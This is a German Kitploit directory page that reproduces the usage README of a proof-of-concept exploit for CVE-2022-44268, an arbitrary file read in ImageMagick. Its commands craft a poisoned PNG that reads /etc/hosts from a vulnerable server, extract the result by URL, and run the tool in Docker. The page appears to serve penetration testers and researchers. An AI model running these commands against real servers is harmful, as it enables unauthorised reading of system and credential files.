Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-44268 — Proof-of-Concept-Exploit für CVE-2022-44268, der beliebiges Dateilesen über manipulierte PNG-Bilder ermöglicht, die auf verwundbare ImageMagick-Instanzen hochgeladen werden. Enthält Docker-Unterstützung und URL-basierte Extraktion. | Kitploit
Tools/GitHubGitHub/kljunowsky/cve-2022-44268
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

Proof-of-Concept-Exploit für CVE-2022-44268, der beliebiges Dateilesen über manipulierte PNG-Bilder ermöglicht, die auf verwundbare ImageMagick-Instanzen hochgeladen werden. Enthält Docker-Unterstützung und URL-basierte Extraktion.

Repository anzeigen
2782vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof-of-Concept-Exploit

Video 📼

https://youtu.be/quKxwNAMBIA

Verwendung 🛠

Bild vergiften ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Upload poisoned PNG image.

Überprüfen, ob der Exploit erfolgreich war 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Ausführen mit Docker 🐳

Erstellen

root@kitploit:~
docker build -t cve-2022-44268 .

Ausführen

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Parameter 🧰

ParameterBeschreibungTyp
--urlDie URL des hochgeladenen PNG-BildesString
--imageEingabe-PNG-DateiFile
--outputAusgabe-PNG-DateiFile
--file-to-readDatei, die vom verletzlichen Host gelesen werden sollString

Kontakt📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Nur zu Bildungszwecken und darf nicht für Gesetzesverstöße oder persönlichen Vorteil verwendet werden.

Der Autor dieses Projekts übernimmt keine Verantwortung für mögliche Schäden, die durch die Materialien dieses Projekts verursacht werden.

Weitere Details: https://www.metabaseq.com/imagemagick-zero-days/

Tool herunterladen